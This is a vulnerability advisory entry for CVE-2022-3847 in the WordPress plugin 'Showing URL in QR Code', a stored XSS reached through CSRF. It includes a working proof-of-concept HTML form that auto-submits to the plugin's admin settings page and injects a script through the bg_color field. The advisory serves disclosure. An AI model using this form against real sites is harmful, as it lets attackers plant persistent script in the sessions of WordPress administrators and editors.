Lucene search
Kunal SharmaWPEX-ID:A70AD549-2E09-44FB-B894-4271AD4A84F6HistoryNov 03, 2022 - 12:00 a.m.
Showing URL in QR Code <= 0.0.1 - Stored XSS via CSRF
2022-11-0300:00:00
Kunal Sharma
81
wordpress-site
csrf
stored xss
qr code
admin
EPSS
0.001
Percentile
30.3%
The plugin does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin or editor add Stored XSS payloads via a CSRF attack
Make a logged in editor or admin open a page with the below payload
<html><form enctype="multipart/form-data" method="POST" action="https://<WordPress-Site>/wp-admin/admin.php?page=my-unique-qr-code" id="csrfpoc"><table><tr><td>checkbox-nested-2</td><td><input type="text" value="on" name="checkbox-nested-2"></td></tr>
<tr><td>bg_color</td><td><input type="text" value=""></div></div><script>alert(/XSS/)</script>" name="bg_color" size="40"></td></tr>
<tr><td>colorDark</td><td><input type="text" value="#000000" name="colorDark"></td></tr>
<tr><td>colorLight</td><td><input type="text" value="#ffffff" name="colorLight"></td></tr>
<tr><td>width</td><td><input type="text" value="200" name="width"></td></tr>
<tr><td>height</td><td><input type="text" value="200" name="height"></td></tr>
<tr><td>urlinqrcoed-submit</td><td><input type="text" value="Save" name="urlinqrcoed-submit"></td></tr>
</table></form><script>csrfpoc.submit()</script></html>Related
cve
cve
CVE-2022-3847
2022-11-28 14:15:17
prion
prion
Cross site request forgery (csrf)
2022-11-28 14:15:00
cnvd
cnvd
WordPress Showing URL in QR Code plugin cross-site scripting vulnerability
2022-11-30 00:00:00
wpvulndb
wpvulndb
Showing URL in QR Code <= 0.0.1 - Stored XSS via CSRF
2022-11-03 00:00:00
nvd
nvd
CVE-2022-3847
2022-11-28 14:15:17
cvelist
cvelist
CVE-2022-3847 Showing URL in QR Code <= 0.0.1 - Stored XSS via CSRF
2022-11-28 13:50:08